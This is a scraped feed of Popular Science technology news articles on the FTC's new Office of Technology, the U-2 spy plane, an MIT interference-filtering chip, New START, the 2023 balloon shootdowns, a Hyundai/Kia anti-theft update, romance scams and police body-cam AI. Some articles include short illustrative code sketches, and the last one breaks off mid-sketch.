Leading the new office is Stephanie Nguyen, the agency’s existing chief technology officer, who recently spoke with PopSci about what the new department will do and what her priorities for it are. 

“In general, the FTC has always stayed on the cutting edge of emerging technology to enforce the law,” she says. “In the 1930s, we looked at deceptive radio ads.” Earlier this century, she notes, they focused on “high-tech spyware.” The goal of the agency in general involves tackling problems that plague the public, like the scourge of robocalls.

“The shift in the pace and volume of evolving tech changes means that we can’t rely on a case-by-case approach,” she adds. “We need to staff up.” And the staffing up comes at a time when the tech landscape is as complex and formidable as it’s ever been, with the rise of controversial tools like generative AI and chatbots, and companies such as Amazon—which just scooped up One Medical, a primary care company, and in 2017 purchased Whole Foods—becoming more and more powerful. 

A relatively recent example of a tech issue the FTC has tackled comes from Twitter, which was hit with a $150 million fine in 2022 for abusing the phone numbers and email addresses it had collected for security purposes because it had permitted “advertisers to use this data to target specific users,” as the FTC noted last year. The Commission has also taken on GoodRx for the way it handled and shared people’s medical data, and it has an ongoing lawsuit against Facebook owner Meta for “anticompetitive conduct.” Meanwhile, in a different case, the FTC was unsuccessful in attempting to block Meta’s acquisition of a VR company called Within Unlimited, which CNBC referred to as “a significant defeat” for the FTC. 

[Related: Why the new FTC chair is causing such a stir]

Nguyen says that as the lines become increasingly blurry between what is, and isn’t, a tech company, the creation of the office became necessary. “Tech cannot be viewed in a silo,” she says. “It cuts across sectors and industries and business models, and that is why the Office of Technology will be a key nexus point for our consumer protection and competition work to enable us to create and scale the best practices.” 

The move at the FTC comes at a time when the tech literacy of various government players is in the spotlight and is crucially important. The Supreme Court has been considering two cases that relate to a law known as Section 230, and Justice Elena Kagan even referred to herself and her fellow justices as “not the nine greatest experts on the internet.” 

At the FTC, what having the new Office of Technology will mean in practice is that the number of what she refers to as in-house “technologists” will roughly double, as they hire about 12 new people. She says that as they create the team, “we need security and software engineers, data scientists and AI experts, human-computer interaction designers and researchers,” as well as “folks who are experts on ad tech or augmented and virtual reality.”

Tejas Narechania, the faculty director for the Berkeley Center for Law & Technology, says that the FTC’s creation of this new office represents a positive step. “I think it’s a really good development,” he says. “It reflects a growing institutional capacity within the executive branch and within our agencies.” 

“The FTC has been operating in this space for a while,” he adds. “It has done quite a bit with data privacy, and it has sometimes been criticized for not really fully understanding the technology, or the development of the technology, that has undergirded some of the industries that it is charged with overseeing and regulating.” (The agency has faced other challenges too.)

One of the ways the people working for the new office will be able to help internally at the FTC, Nguyen says, is to function as in-house subject matter experts and conduct new research. She says they’ll tackle issues like “shifts in digital advertising, to help the FTC understand implications of privacy, competition, and consumer protection, or dissecting claims made about AI-powered products and assessing whether it’s snake oil.” 

Having in-house expertise will help them approach tech questions more independently, Narechania speculates. The FTC will “be able to bring its own knowledge to bear on these questions, rather than relying on the very entities it’s supposed to be scrutinizing for information,” he reflects. “To have that independent capacity for evaluation is really important.” 

For Nguyen, she says the big-picture goal of the new office is that they are “here to strengthen the agency’s ability to be knowledgeable and take action on tech changes that impact the public.”


]]>
The real star of this aerial selfie isn’t the balloon—it’s the U-2 spy plane https://www.popsci.com/technology/u-2-spy-plane-balloon-selfie/ Thu, 23 Feb 2023 22:54:19 +0000 https://www.popsci.com/?p=515036
U-2 spy plane balloon selfie
The DOD has captioned this photo: "A U.S. Air Force pilot looked down at the suspected Chinese surveillance balloon as it hovered over the Central Continental United States February 3, 2023.". Photo courtesy of the Department of Defense

Let's take a close look at the U-2, a high-flying spy plane whose pilot wears a space suit.

The post The real star of this aerial selfie isn’t the balloon—it’s the U-2 spy plane appeared first on Popular Science.

]]>

A striking photo released on February 22 by the Department of Defense reveals a unique aerial scene: The image shows the Chinese surveillance balloon as seen from the cockpit of a U-2 spy plane on February 3, along with the pilot’s helmet, the aircraft’s wing, and even the shadow of the plane itself on the balloon. 

While the subject of the photo is the balloon, which was later shot down by an F-22, the aircraft that made the image possible is referenced in the image’s simple title: “U-2 Pilot over Central Continental United States.” Here’s a brief primer on that aircraft, a high-flying spy plane with a reputation for being tough to operate and land.  

The U-2 aircraft is designed to operate at “over 70,000 feet,” according to an Air Force fact sheet. That very high altitude means that it flies way higher than commercial jet aircraft, which tend to cruise at a maximum altitude in the lower end of the 40,000-foot range. 

The U-2’s ability to climb above 70,000 feet in altitude “makes it, I believe, the highest flying aircraft that we know about in the Air Force inventory,” says Todd Harrison, a defense analyst with Metrea, a firm formerly known as Meta Aerospace. “That becomes important for a mission like this, where the balloon was operating around 60,000 feet.”

[Related: Why the US might be finding more unidentified flying objects]

The plane features wings that stretch to a width of 105 feet, which is about three times longer than the wingspan of an F-16. “It is designed for very high altitude flight, and it has a very efficient wing—[a] very high aspect ratio wing, so that makes it very long and slender,” Harrison says. Long, slender wings are indeed more efficient than shorter, stubbier ones, which is one of the reasons NASA and Boeing are planning to have truss-supported skinny wings on an experimental commercial aircraft called the Sustainable Flight Demonstrator that would be more fuel efficient than existing models. 

On the U-2, those long wings, which are an asset in the sky, make for a real challenge when trying to get it back down on the ground. “This jet does not want to be on the ground, and that’s a real problem when it comes to landing it,” Matt Nauman, a U-2 pilot, said at an Air Force event in 2019 that Popular Science attended. To land it, “we’ll actually slow down, and that nose will continue to come up until the plane essentially falls out of the sky,” at just about two feet off the ground.  

[Related: Biden says flying objects likely not ‘related to China’s spy balloon program’]

A few other aspects figure into the landing. One is that the aircraft has what’s known as bicycle-style landing gear, as opposed to the tricycle-style landing gear of a regular commercial plane. In other words: It has just two landing gear legs, not three, so it is tippy from side to side as it touches down. To help with those landings, a chase car literally follows the plane down the runway as it’s coming in to land, with its driver—a U-2 pilot as well—in radio contact with the pilot in the plane to help them get the bird on the tarmac. This video shows that process. 

U-2 pilot helmet
A U-2 pilot gets a screw tightened on his helmet in the UAE in 2019. US Air Force / Gracie I. Lee

Because the plane is designed to fly at such high altitudes, the pilot dons a heavy space suit like this daredevil wore in 2012, while the cockpit is pressurized to an altitude of about 14,000 or 15,000 feet. Having that gear on makes landing the plane even more challenging, as another U-2 pilot said in 2019, reflecting: “You’re effectively wearing a fishbowl on your head.” But having the suit means the pilot is protected from the thin atmosphere if the plane were to have a problem or the pilot had to eject.  

[Related: Everything you could ever want to know about flying the U-2 spy plane]

The point of the aircraft is to gather information. “It is used to spy, and collect intelligence on others,” says Harrison. “It has been upgraded and modernized over the years, with airframe modernization, obviously the sensors have gotten better and better.” The U-2 famously used to shoot photographs using old-school wet film with what’s called the Optical Bar Camera, and stopped doing so only in the summer of 2022. 

A U-2 in Nevada in 2018.
A U-2 in Nevada in 2018. US Air Force / Bailee A. Darbasie

As for the recent photo of the surveillance balloon from the U-2, a reporter for NPR speculated that it was taken “just south of Bellflower,” Missouri, as did a Twitter user with the handle @obretix.

“It’s a pretty incredible photo,” Harrison reflects. “It does show that the US was actively surveilling this balloon up close throughout its transit of the United States. It’s interesting that the U-2 pilot was actually able to capture a selfie like that while flying at that altitude.”


On February 6, a Popular Science sibling website, the War Zone, reported that the US had employed U-2 aircraft to keep tabs on the balloon. And on February 8, CNN reported before this photo’s official release that a “pilot took a selfie in the cockpit that shows both the pilot and the surveillance balloon itself,” citing US officials.


]]>
A new smartphone chip could keep your cell signal alive in crowded places https://www.popsci.com/technology/smartphone-chip-interferences/ Thu, 23 Feb 2023 16:00:00 +0000 https://www.popsci.com/?p=513939
Two gloved hands opening a smartphone on a workbench
A new design could ease headaches caused by slow smartphones in crowded areas. Deposit Photos

Slow phones in a crowded zone could hopefully soon be a thing of the past.

The post A new smartphone chip could keep your cell signal alive in crowded places appeared first on Popular Science.

]]>


You’re not imagining things—your phone often doesn’t work as well when you’re stuck in a large crowd. More people means more competing signals and data requests, so phones eventually fail to connect with their networks, creating a backlog of demand. This, in turn, slows down everyone’s speeds while frequently draining device batteries faster than usual.

However, the days of grimacing at your phone while at a concert or basketball game may soon be behind you, thanks to a new development from a research team at MIT.

“Imagine you’re at a party with loud music and you want to listen to your own music using headphones. But the outside noise is so loud that you can’t hear your own music unless you turn on the noise cancellation feature,” posits Soroush Araei, an MIT graduate student in electrical engineering and computer science and lead author of the project’s paper showcased this week at the International Solid-State Circuits Conference.

[Related: What happens after the 3G network dies?]

“Well, a similar thing happens with the wireless signals all around us,” he explains. “Devices like your iPhone need to detect signals from WiFi, Bluetooth, GPS, and 5G radio, but these signals can interfere with each other. To detect all the signals, your device needs multiple bulky filters outside the chip, which can be expensive.”

Those bulky external filters may soon be unnecessary. Araei’s team developed a new method that brings the filtering technology within the chip itself while covering a large spectrum of frequencies. The improved design could greatly reduce production costs, make devices smaller and more efficient, and potentially even improve battery life.

“In short, our research can make your devices work better with fewer dropped calls or poor connections caused by interference from other devices,” says Araei.

The team’s advances work using something called a “mixer-first architecture” to identify and block unwanted interferences without harming a phone’s performance. In this setup, a radio frequency signal is converted into a lower frequency as soon as it is received by a device. From there, the signal’s digital bits are extracted via an analog-to-digital converter.

As useful as that is, there’s still the issue of harmonic interference to solve, which refers to signals at frequencies that are integer multiples of a specific device’s operating frequency. A phone operating at 1 gigahertz (GHz), for example, faces harmonic interference from signals at 2, 3, 4 (and so on) GHz. During the signal conversion, these harmonics can be virtually indistinguishable from the actual intended frequency, and muck up the whole process.
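To see why harmonics are such a nuisance, note that a practical switching mixer behaves like a square wave, and a square wave contains odd harmonics of the local oscillator. The sketch below is purely illustrative (it is not the MIT team's circuit, and it uses scaled-down stand-in frequencies rather than real gigahertz values); it shows numerically that an interferer near three times the oscillator frequency lands on the exact same intermediate frequency as the desired signal:

```python
import math
import cmath

# Illustrative only: a square-wave local oscillator (LO) has odd harmonics,
# so an interferer near 3x the LO frequency downconverts onto the same
# intermediate frequency (IF) as the desired signal near 1x the LO.
fs, n = 1000, 1000                       # sample rate (Hz), one second of samples
f_lo, f_if = 10, 1                       # LO frequency and target IF (stand-ins)
t = [k / fs for k in range(n)]
lo = [1.0 if math.sin(2 * math.pi * f_lo * tk) >= 0 else -1.0 for tk in t]

def if_amplitude(f_sig):
    """Mix a unit-amplitude tone at f_sig with the square-wave LO and
    measure how much energy lands at the IF."""
    mixed = [math.cos(2 * math.pi * f_sig * tk) * s for tk, s in zip(t, lo)]
    # project the mixed signal onto a complex tone at the IF
    proj = sum(m * cmath.exp(-2j * math.pi * f_if * tk) for m, tk in zip(mixed, t))
    return 2 * abs(proj) / n

desired = if_amplitude(f_lo + f_if)       # wanted signal just above the LO
harmonic = if_amplitude(3 * f_lo + f_if)  # interferer near the 3rd harmonic
print(f"desired at IF:    {desired:.3f}")   # about 2/pi
print(f"interferer at IF: {harmonic:.3f}")  # about 2/(3*pi), one-third as strong
```

The interferer leaks through at roughly one-third the strength of the desired signal, which in a real receiver is plenty to corrupt reception; suppressing exactly this kind of leakage on-chip is what the new architecture is for.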

[Related: AT&T just shut down its 3G network. Here’s how it could affect your car.]

MIT researchers combined the mixer-first architecture alongside other techniques such as capacitor stacking and charge sharing to block harmonic interference issues while not losing any of the desired information.

“People have used these techniques, charge sharing and capacitor stacking, separately before, but never together. We found that both techniques must be done simultaneously to get this benefit. Moreover, we have found out how to do this in a passive way within the mixer without using any additional hardware while maintaining signal integrity and keeping the costs down,” says Araei.

To test their new configuration, the team sent a desired signal alongside harmonic interference, then measured the novel chip’s abilities. The results were impressive—the upgraded device effectively blocked out the harmonics with minimal loss of signal strength, while also handling signals over 40 times more powerful than existing state-of-the-art receivers. And all this from a piece of hardware that is far cheaper, smaller, and simpler to produce than what’s currently available. Because it doesn’t require any additional hardware, the new architecture could also soon be manufactured easily at scale for future generations of smartphones, tablets, and laptops. 


]]>
Putin is backing away from New START—here’s what that nuclear treaty does https://www.popsci.com/technology/us-russia-new-start-treaty-explained/ Tue, 21 Feb 2023 23:29:14 +0000 https://www.popsci.com/?p=514054
A B-52 seen in 2021. This bomber type is nuclear-capable.
A B-52 seen in 2021. This bomber type is nuclear-capable. Stephanie Serrano / US Air Force

The agreement between the US and Russia caps how many nuclear weapons each country can deploy.

The post Putin is backing away from New START—here’s what that nuclear treaty does appeared first on Popular Science.

]]>

Today, President Vladimir Putin of Russia announced that the country would suspend participation in New START, the last standing major arms control treaty between the country and the United States. Putin clarified that the suspension was not a withdrawal—but the suspension itself represents a clear deterioration of trust and nuclear stability between the countries with the world’s two largest nuclear arsenals. 

Putin’s remarks come a few days before the anniversary of Russia’s invasion of Ukraine, a war entirely of Russia’s choosing that has produced some concrete Russian gains, even as many of its biggest advances have been repulsed and rolled back. At present, much of the fighting is grinding, static warfare along trenches and defended positions in Ukraine’s east. It is a kind of warfare akin to the bloody fronts of World War I, though the presence of drones and long-range precision artillery lends it an undeniably modern character.

Those modern weapons, and the coming influx of heavy tanks from the United States and other countries to Ukraine, put Putin’s remarks in some more immediate context. While New START is specifically an agreement between the United States and Russia over nuclear arsenals, the decision to suspend participation comes against the backdrop of the entirely conventional war being fought by Russia against Ukraine, with US weapons bolstering the Ukrainian war effort.

A follow-up statement from Russia’s Ministry of Foreign Affairs clarified that the country would still notify the United States about any launches of Intercontinental or Submarine-Launched Ballistic Missiles (ICBMs and SLBMs), and would expect the same in reverse, in accordance with a 1988 agreement between the US and the USSR. That suggests there is at least some ongoing effort to not turn a suspension of enforcement into an immediate crisis.

To understand why the suspension matters, and what future there is for arms control, it helps to understand the agreement as it stands.

What is New START?

New START is an agreement between the United States and the Russian Federation, which carries a clunky formal name: The Treaty between the United States of America and the Russian Federation on Measures for the Further Reduction and Limitation of Strategic Offensive Arms. The short-form name, which is not really a true acronym, is instead a reference to START I, or the Strategic Arms Reduction Treaty, which was in effect from 1991 to 2009 and which New START replaced in 2011. New START is set to expire in 2026, unless it is renewed by both countries.

New START is the latest of a series of agreements limiting the overall size of the US and Russian (first Soviet) nuclear arsenals, which at one point each measured in the tens of thousands of warheads. Today, thanks largely to mutual disarmament agreements and the limits outlined by New START, the US and Russia have arsenals of roughly 5,400 and 6,000 warheads, respectively. Of those, the US is estimated to have 1,644 deployed strategic weapons, a term that means nuclear warheads on ICBMs or at heavy bomber bases, presumably ready to launch at a moment’s notice. Russia is estimated to have around 1,588 deployed strategic weapons.

As the State Department outlines, the treaty limits both countries to 700 total deployed ICBMs, SLBMs, and bombers capable of carrying nuclear weapons. (Bombers are counted under the treaty in the same way as a missile with one warhead, though nuclear-capable bombers like the B-52, B-2, and soon-to-be B-21 can carry multiple warheads.) In addition, the treaty sets a limit of 1,550 nuclear warheads on deployed ICBMs, deployed SLBMs, and deployed heavy bombers equipped for nuclear armaments, as well as 800 deployed and non-deployed ICBM launchers, SLBM launchers, and heavy bombers equipped for nuclear armaments.
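Those counting rules can be condensed into a small sketch (a deliberate simplification for illustration; the treaty itself defines many more categories and verification provisions):

```python
# Simplified illustration of the New START limits described above.
WARHEAD_LIMIT = 1550           # deployed warheads (each bomber counts as one)
DEPLOYED_LAUNCHER_LIMIT = 700  # deployed ICBMs, SLBMs, and heavy bombers
TOTAL_LAUNCHER_LIMIT = 800     # deployed plus non-deployed launchers/bombers

def counted_warheads(icbm_warheads, slbm_warheads, deployed_bombers):
    # Each deployed heavy bomber counts as a single warhead under the treaty,
    # even though aircraft like the B-52 or B-2 can carry several.
    return icbm_warheads + slbm_warheads + deployed_bombers

def within_limits(icbm_warheads, slbm_warheads,
                  deployed_icbms, deployed_slbms, deployed_bombers,
                  total_launchers):
    warheads = counted_warheads(icbm_warheads, slbm_warheads, deployed_bombers)
    deployed = deployed_icbms + deployed_slbms + deployed_bombers
    return (warheads <= WARHEAD_LIMIT
            and deployed <= DEPLOYED_LAUNCHER_LIMIT
            and total_launchers <= TOTAL_LAUNCHER_LIMIT)

# A notional arsenal: 400 ICBM warheads, 1,090 SLBM warheads, and 60 deployed
# bombers counts as exactly 1,550 treaty warheads, right at the cap.
print(counted_warheads(400, 1090, 60))  # 1550
```

The bomber rule is why a country's "deployed strategic weapons" figure under the treaty can understate how many warheads its bomber fleet could actually deliver.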

In its follow-up statement to the suspension of New START, Russia’s Ministry of Foreign Affairs clarified it would stick to the overall cap on warheads and launch systems as outlined in the treaty.

What will change is the end of inspections, which have been central to the “trust but verify” structure of arms control agreements between the US and Russia for decades. The terms of New START allow both countries to inspect deployed and non-deployed strategic systems (like missiles or bombers) up to 10 times a year, as well as non-deployed systems up to eight times a year. These on-site inspections were halted in April 2020 in response to the COVID-19 pandemic, and their resumption is now the most obvious casualty of this change in posture.

It is unclear, yet, if this suspension means the end of the treaty forever, though Putin taking such a step certainly doesn’t bode well for its continued viability. Should New START formally end, some analysts fear it may usher in a new era of nuclear weapons production, and a rapid expansion of nuclear arsenals.

While that remains a possibility, the hard limits of nuclear production, as well as decades of faded production expertise in both Russia and the United States, mean such a restart may be more intensive, in time and resources, than immediately feared. Both nations have spent the last 30 years working on production of conventional forces. Ending an arms control treaty over nuclear weapons would be a gamble, suggesting nuclear weapons are the only tool that can provide security where conventional arms have failed.


]]>
Biden says flying objects likely not ‘related to China’s spy balloon program’ https://www.popsci.com/technology/president-biden-speaks-about-unidentified-objects/ Thu, 16 Feb 2023 21:22:11 +0000 https://www.popsci.com/?p=513047
An F-22 in flight on Dec. 3, 2022.
An F-22 in flight on Dec. 3, 2022. Kaitlyn Lawton / US Air Force

The presidential address also noted that the increase in UAP sightings were due in part to "enhancing our radar to pick up more slow-moving objects."

The post Biden says flying objects likely not ‘related to China’s spy balloon program’ appeared first on Popular Science.

]]>

Since February 4, United States aircraft have shot down four objects passing over North American skies. The first of these, a massive high-altitude surveillance balloon traced to China, meandered over the country for four days before becoming the first air-to-air kill for the high-end F-22 stealth jet fighter. The other three, however, have not yet been identified, except for their size, altitude, and ability to stay aloft seemingly on wind power alone.

President Joe Biden addressed the topic in remarks delivered today. “Last week, in the immediate aftermath of the incursion by China’s high altitude balloon, our military, through the North American Aerospace Defense Command, so-called NORAD, closely scrutinized our airspace, including enhancing our radar to pick up more slow-moving objects above our country and around the world,” he said. “In doing so they tracked three unidentified objects—one in Alaska, Canada, and over Lake Huron in the Midwest.” 

“They acted in accordance with established parameters for determining how to deal with unidentified aerial objects in US airspace,” he added. “At their recommendation, I gave the order to take down the three objects, due to hazards to civilian commercial air traffic, and because we could not rule out the surveillance risk of sensitive facilities.”

[Related: How high do planes fly? It depends on if they’re going east or west.]

Given the short timeline between the tracking of China’s high altitude balloon and the following shootdowns, expanding the aperture of existing sensors was the most expected way to widen what swaths of the sky could be observed. One effect of that is suddenly detecting objects previously unobserved. Notably, Biden highlighted that the newly found objects were slow-moving. NORAD’s sensors, for decades trained to track fast moving planes and missiles, are not calibrated by default to look for balloons, which drift through the sky.

“Our military, and the Canadian military, are seeking to recover the debris so we can learn more about these three objects,” said Biden. “We don’t yet know exactly what these three objects were but nothing right now suggests they were related to China’s spy balloon program or that they were surveillance vehicles from any other country.”

Minutes before Biden gave his remarks, Aviation Week published a plausible explanation of the objects. The story notes that the Northern Illinois Bottlecap Balloon Brigade, a hobbyist club, had tracked a high-altitude pico balloon they had launched to the coast of Alaska at just under 40,000 feet on February 10. Predicted wind direction would have brought that balloon over the Yukon on February 11.

That, notes Aviation Week, was “the same day a Lockheed Martin F-22 shot down an unidentified object of a similar description and altitude in the same general area.”

“Launching high-altitude, circumnavigational pico balloons has emerged only within the past decade,” continues the story. “At any given moment, several dozen such balloons are aloft, with some circling the globe several times before they malfunction or fail for other reasons. The launch teams seldom recover their balloons.”

While Biden did not name what the downed objects were, he said the intelligence community’s best assessment is that the three objects were most likely balloons tied to private companies, recreational users, or research institutions.

“I want to be clear: We don’t have any evidence that there has been a sudden increase in the number of objects in the sky, we’re now just seeing more of them partially because of the steps we’ve taken to increase our radar, and we have to keep adapting to dealing with these challenges,” he said.

While the larger surveillance balloon from China was easier to track based on its mass alone, the existence of small, potentially hobbyist or commercial balloons riding high-altitude winds appears to come as something of a surprise. 

“In the U.S., academic and commercial balloons have to include transponders that let the FAA know where they are at all times,” Jeff Jackson, a US representative from North Carolina, shared in his notes on a congressional briefing with NORAD on the Unidentified Aerial Phenomena (UAP). “These UAPs did not appear to have transponders, and that was also a factor in the decision to shoot them down.”

Transponders are a key tool for larger aircraft, as they make air traffic visible to people in the sky and on the ground. For something as light as a hobbyist research balloon aiming at high altitude, the weight of a transponder and the batteries to power it could strain the craft. Finding a different solution, one that allows air traffic controllers and pilots to avoid such balloons, is a likely first step to ensuring the skies remain safe and the objects don’t go unidentified. 

Transponders wouldn’t solve the problem of balloons sent with malicious intent, but they would at least allow those with purely peaceful purposes to be affirmatively identified as safe. Biden outlined a set of policies to avoid shootdowns like those experienced this month. One improvement would be an accessible inventory of objects in the airspace above the US, kept up to date. Another would be improving the ability of the US to detect uncrewed objects, like small high-altitude balloons. Changing the rules for launching and maintaining objects would also help the US get hobbyist launches, like that from the Northern Illinois Bottlecap Balloon Brigade, on its radar, metaphorically and perhaps literally. Finally, Biden suggested the US work with other countries to set out better global norms for airspace.  

“We’re not looking for a new Cold War,” said Biden. “But we will compete, and we will responsibly manage that competition so it doesn’t veer into conflict.”

In the history of high-altitude surveillance from the last Cold War, efforts to spy by balloon and plane led to crisis. The rules and norms allowing countries to share space, instead, allowed countries to keep spying on each other, while also fostering tremendous economic and scientific developments alongside the spycraft.

Watch the address, below:


]]>
A software update could make your Hyundai or Kia harder to steal https://www.popsci.com/technology/hyundai-kia-software-update-stop-car-theft/ Wed, 15 Feb 2023 23:00:00 +0000 https://www.popsci.com/?p=512752
A Kia in Minneapolis
weston m / Unsplash

The patch will be free. Here's what it does.

The post A software update could make your Hyundai or Kia harder to steal appeared first on Popular Science.

]]>

South Korean automakers Hyundai and Kia have developed a software fix that is intended to stop a recent social-media-fueled theft wave. Over the past few years, thousands of Hyundai and Kia vehicles have been stolen as videos demonstrating how easy certain models were to start without a key spread on YouTube and TikTok. According to the National Highway Traffic Safety Administration (NHTSA), the fix will be available free of charge and will roll out over the coming months.

Most modern cars are fitted with an immobilizer system that prevents them from being hot wired or started without the correct key. A chip in the key communicates with the electronic control unit (ECU) in the car’s engine. When the driver attempts to start the car, either by turning the key or pushing a button, the chip sends a signal confirming that they are using the right key for the car, and the ECU allows the engine to start. If a thief tries to start a car without the correct key—say, using a screwdriver—then the ECU doesn’t receive the signal and prevents the vehicle from turning on. While immobilizers won’t stop dedicated, technologically advanced thieves, they make it much harder for opportunists.
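Conceptually, the key-to-ECU exchange resembles a shared-secret challenge and response. The sketch below is a loose Python analogy, not the actual proprietary transponder protocol (real automotive immobilizers typically use much lighter-weight cryptography than the HMAC-SHA-256 used here for illustration):

```python
import hashlib
import hmac
import os

# Illustrative analogy only: both the key's chip and the ECU hold a shared
# secret programmed at the factory. The ECU issues a fresh random challenge
# at each start attempt; only a chip holding the secret can answer it.
SECRET = os.urandom(16)  # hypothetical shared secret

def key_chip_respond(challenge: bytes, secret: bytes) -> bytes:
    """The chip in the key 'signs' the ECU's random challenge."""
    return hmac.new(secret, challenge, hashlib.sha256).digest()

def ecu_allows_start(response: bytes, challenge: bytes, secret: bytes) -> bool:
    """The ECU enables the engine only if the response matches what it
    computes from its own copy of the secret."""
    expected = hmac.new(secret, challenge, hashlib.sha256).digest()
    return hmac.compare_digest(response, expected)

challenge = os.urandom(8)                           # new challenge per start attempt
good = key_chip_respond(challenge, SECRET)
print(ecu_allows_start(good, challenge, SECRET))    # True: right key, engine starts
bad = key_chip_respond(challenge, os.urandom(16))   # wrong chip (or a screwdriver)
print(ecu_allows_start(bad, challenge, SECRET))     # False: engine stays immobilized
```

The affected Hyundai and Kia models skip this handshake entirely, which is why bypassing the lock cylinder is enough to start them.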

Unfortunately for car owners, the Hyundai and Kia models targeted in the recent thefts don’t have an immobilizer. The simple chip system in the key can be bypassed by connecting a USB phone charger to a specific circuit accessible in the steering column, and the car can then be started with a screwdriver. 

According to a report by CNBC last year, police around the country have noted a sharp spike in TikTok-inspired thefts. The fallout was bad enough that multiple cities have pursued legal action against the two Korean automakers. There’s also a class action lawsuit, and some insurance companies are refusing to cover the impacted models. NHTSA claims that there have been at least 14 crashes and eight deaths. 

According to NHTSA, the software fix will roll out to the approximately 3.8 million affected Hyundais and 4.5 million affected Kias in a number of phases starting later this month. The specific models aren’t being widely publicized for somewhat obvious reasons, but they are mostly the more affordable ones that use a mechanical key rather than a fob and push-button. If you want to learn more about your vehicle, NHTSA recommends contacting Hyundai (800-633-5151) or Kia (800-333-4542) for more information.

The update makes two changes to the theft alarm software in the cars. It increases the length of time the alarm sounds from 30 seconds to one minute and also prevents the car from starting if the key isn’t in the ignition. 

This isn’t the first time that a software update has been used to add anti-theft features to a line of cars. Back in 2021, Dodge rolled out an update to its high horsepower Charger and Challenger models that were apparently being targeted by key-spoofing thieves. While already fitted with an immobilizer, the update added an additional layer of protection that limited the engines to just three horsepower if the correct pin wasn’t entered.

In addition to the software update, affected Hyundai and Kia customers will receive a window sticker alerting would-be thieves that the vehicle has anti-theft measures installed. While it won’t add any extra security, it might stop some thieves before they break a car window.

In a more old-school fix, Hyundai and Kia have also been working with law enforcement agencies to provide more than 26,000 steering wheel locks to affected vehicle owners. The steering wheel locks have been sent to 77 agencies in 12 states. The Department of Transportation’s NHTSA suggests contacting local law enforcement to see if one is available if you own an affected car.

The post A software update could make your Hyundai or Kia harder to steal appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

Don’t fall for an online love scam this Valentine’s Day https://www.popsci.com/technology/ftc-romance-scams-report/ Tue, 14 Feb 2023 14:30:00 +0000 https://www.popsci.com/?p=511963
Woman covering face with hands in frustration while sitting in front of laptop on an office desk.
Online romance scammers like to claim they are deployed overseas in the military or need help with a family emergency. Deposit Photos

A new report from the FTC highlights the telltale signs of suspicious online romance. Hot tip: avoid any crypto requests.

The post Don’t fall for an online love scam this Valentine’s Day appeared first on Popular Science.


Just in time for Valentine’s Day, the heartbreakers at the Federal Trade Commission recently released their latest report on online romance scammers and the aftermath of their schemes. According to the FTC’s statistics, almost 70,000 people reported falling for romance scams, amounting to $1.3 billion in personal losses; the median individual loss was around $4,400.

As the FTC report details, con artists are constantly improving their tactics and are frequently scouring social media platforms such as Facebook, Twitter, and Instagram for personal information on their targets. As such, they approach their potential victims armed with quick, seemingly meant-to-be similarities. “You like a thing, so that’s their thing, too. You’re looking to settle down. They’re ready too,” explains Emma Fletcher, author of the FTC’s Data Spotlight rundown.

[Related: Cryptocurrency scammers are mining dating sites for victims.]

After approaching people via these digital venues, conversations often move to messaging apps like Telegram, Google Chat, or WhatsApp. From there, scammers try to elicit money, additional personal details, and potentially explicit images and videos, which they can then use for blackmail—a tactic often referred to as “sextortion.”

Unsurprisingly, the vast majority of payments sent to scam artists came in the form of cryptocurrency and wire transfers, given how difficult both are to trace. Other common requests include gift cards and payments to cover a nonexistent package’s shipping costs.

The FTC broke down scammers’ preferred storylines via keyword analysis of more than 8 million romance scam reports that resulted in monetary losses. Nearly a quarter of the lies involved someone claiming a friend or relative is sick, hurt, or in jail. Grifters also like to claim they can teach victims how to invest, are deployed overseas in the military, or have recently come into some fortune they inexplicably want to share.

[Related: Social media scammers made off with $770 million last year.]

Anyone hoping to avoid becoming a lovelorn statistic should abide by a few straightforward rules: First off, virtually no legitimate suitor will request money or investments via crypto or gift cards out of the blue; swipe left if one ever does. Run your potential lover’s stories by friends and family to see if anyone raises an eyebrow, and trust those suspicions.

Lastly, the FTC suggests a rather ingenious bit of amateur sleuthing if you ever start having second thoughts: Conduct a reverse image search on any supposed photographs or selfies a pursuer offers. If the stories don’t line up, it’s time to wade elsewhere in the online dating pool.



Police are paying for AI to analyze body cam audio for ‘professionalism’ https://www.popsci.com/technology/police-body-cam-ai-truleo/ Fri, 10 Feb 2023 15:00:00 +0000 https://www.popsci.com/?p=510118
Chest of police officer in uniform wearing body camera next to police car.
Truleo transcribes bodycam audio, then classifies police-civilian interactions. Jonathan Wiggs/The Boston Globe via Getty Images

Law enforcement is using Truleo's natural language processing AI to analyze officers' interactions with the public, raising questions about efficacy and civilian privacy.

The post Police are paying for AI to analyze body cam audio for ‘professionalism’ appeared first on Popular Science.


An increasing number of law enforcement departments are reportedly turning to artificial intelligence programs to monitor officers’ interactions with the public. According to multiple sources, police departments are specifically enlisting Truleo, a Chicago-based company which offers AI natural language processing for audio transcription logs ripped from already controversial body camera recordings. The partnership raises concerns regarding data privacy and surveillance, as well as efficacy and bias issues that come with AI automation.

Founded in 2019 through a partnership with FBI National Academy Associates, Inc., Truleo now possesses a growing client list that already includes departments in California, Alabama, Pennsylvania, and Florida. Seattle’s police department just re-upped on a two-year contract with the company. Police in Aurora, Colorado—currently under a state attorney general consent decree regarding racial bias and excessive use of force—are also in line for the software, which reportedly costs roughly $50 per officer, per month.

[Related: Police body cameras were supposed to build trust. So far, they haven’t.]

Truleo’s website says it “leverages” proprietary natural language processing (NLP) software to analyze, flag, and categorize transcripts of police officers’ interactions with citizens in the hopes of improving professionalism and efficacy. Transcript logs are classified based on certain parameters and presented to customers via detailed reports to use as they deem appropriate. For example, Aurora’s police chief, Art Acevedo, said in a separate interview posted on Truleo’s website that the service can “identify patterns of conduct early on—to provide counseling and training, and the opportunity to intervene [in unprofessional behavior] far earlier than [they’ve] traditionally been able to.”

Speaking to PopSci over the phone, Anthony Tassone, Truleo’s co-founder and CEO, stressed Truleo software “relies on computers’ GPU” and is only installed within a police department’s cloud environment. “We don’t have logins or access to that information,” he says. Truleo’s sole intent, he says, is to provide textual analysis tools for police departments to analyze and assess their officers.

The company website offers example transcripts with AI-determined descriptions such as “formality,” “explanation,” “directed profanity,” and “threat.” The language detection skills also appear to identify actions such as pursuits, arrests, or medical attention requests. Examples of the program’s other classifications include “May I please see your license and registration?” (good) and “If you move from here I will break your legs” (bad).
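Truleo's actual models are proprietary, but the kind of phrase-level flagging its example transcripts suggest can be illustrated with simple keyword rules. Everything below (the category labels' trigger phrases, the function name) is a hypothetical sketch, not Truleo's method:

```python
# Toy illustration of tagging transcript lines with categories like those
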